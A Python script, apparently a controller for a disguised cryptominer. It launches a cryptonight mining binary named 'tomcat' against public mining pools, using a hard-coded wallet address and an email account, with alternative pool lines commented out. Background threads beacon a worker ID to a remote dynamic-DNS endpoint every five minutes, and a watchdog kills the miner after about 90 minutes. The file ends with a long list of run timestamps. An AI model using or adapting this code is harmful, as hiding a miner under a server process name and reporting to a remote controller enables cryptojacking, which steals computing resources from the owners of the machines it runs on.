import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:41:06.921218
#2018-02-17 16:27:05.778336
#2018-02-17 18:14:05.331952
#2018-02-17 20:02:04.426201
#2018-02-17 21:50:01.492433
#2018-02-17 23:35:04.174664
#2018-02-18 01:24:03.484733
#2018-02-18 03:11:03.298218
#2018-02-18 05:01:04.054459
#2018-02-18 06:52:06.419998
#2018-02-18 08:42:02.063792
#2018-02-18 10:28:01.566968
#2018-02-18 12:13:07.282159
#2018-02-18 13:59:03.675345
#2018-02-18 15:49:05.345753
#2018-02-18 17:39:06.033899
#2018-02-18 19:27:06.997448
#2018-02-18 21:12:03.491627
#2018-02-18 22:59:05.961824
#2018-02-19 00:47:03.209794
#2018-02-19 02:34:04.440085
#2018-02-19 04:20:02.069496
#2018-02-19 06:05:04.445701
#2018-02-19 07:53:07.200537
#2018-02-19 09:43:01.452891
#2018-02-19 11:33:09.547455
#2018-02-19 13:20:07.631404
#2018-02-19 15:09:09.129746
#2018-02-19 16:56:09.528339
#2018-02-19 18:42:07.529771
#2018-02-19 20:31:05.792013
#2018-02-19 22:18:01.533212
#2018-02-20 00:03:08.013232
#2018-02-20 01:50:04.394446
#2018-02-20 03:38:06.426805
#2018-02-20 05:23:06.332162
#2018-02-20 07:09:02.194512
#2018-02-20 08:54:06.118120
#2018-02-20 10:38:06.527301
#2018-02-20 12:24:08.686010
#2018-02-20 14:13:06.439269
#2018-02-20 15:57:14.326729
#2018-02-20 17:43:10.193527
#2018-02-20 19:33:04.737406
#2018-02-20 21:20:01.268669
#2018-02-20 23:04:01.383585
#2018-02-21 00:47:04.694085
#2018-02-21 02:31:06.738597
#2018-02-21 04:21:04.411348
#2018-02-21 06:08:01.350806
#2018-02-21 07:54:04.285811
#2018-02-21 09:39:07.743315
#2018-02-21 11:28:02.037467
#2018-02-21 13:16:08.990788
#2018-02-21 15:02:05.989053
#2018-02-21 16:51:04.412797
#2018-02-21 18:40:06.903403
#2018-02-21 20:24:08.549382
#2018-02-21 22:13:05.748690
#2018-02-22 00:02:06.053173
#2018-02-22 01:50:07.778554
#2018-02-22 03:36:06.758296
#2018-02-22 05:22:06.050059
#2018-02-22 07:08:08.297222
#2018-02-22 08:56:05.553072
#2018-02-22 10:43:09.525433
#2018-02-22 12:29:06.764217
#2018-02-22 14:16:06.502737
#2018-02-22 16:05:12.120871
#2018-02-22 17:51:05.355901
#2018-02-22 19:37:08.338285
#2018-02-22 21:30:09.862768
#2018-02-22 23:17:05.720905
#2018-02-23 01:06:06.575241
#2018-02-23 02:54:04.402089
#2018-02-23 04:34:01.702329
#2018-02-23 06:20:09.072914
#2018-02-23 08:07:05.876118
#2018-02-23 10:24:08.118373
#2018-02-23 12:19:01.316232
#2018-02-23 14:07:07.319179
#2018-02-23 15:58:04.388296
#2018-02-23 17:43:10.054996
#2018-02-23 19:31:01.274631
#2018-02-23 21:14:02.211787
#2018-02-23 23:01:07.866941
#2018-02-24 00:48:01.644722
#2018-02-24 02:37:04.154095
#2018-02-24 04:31:04.397333
#2018-02-24 06:15:08.533918
#2018-02-24 08:03:04.763085
#2018-02-24 09:46:05.852580
#2018-02-24 11:42:03.983148
#2018-02-24 13:33:04.887744
#2018-02-24 15:21:01.372523
#2018-02-24 17:10:03.749040
#2018-02-24 19:02:02.173570
#2018-02-24 20:49:02.020569
#2018-02-24 23:07:03.556407
#2018-02-25 02:23:05.115805
#2018-02-25 05:55:01.343670
#2018-02-25 11:38:01.708625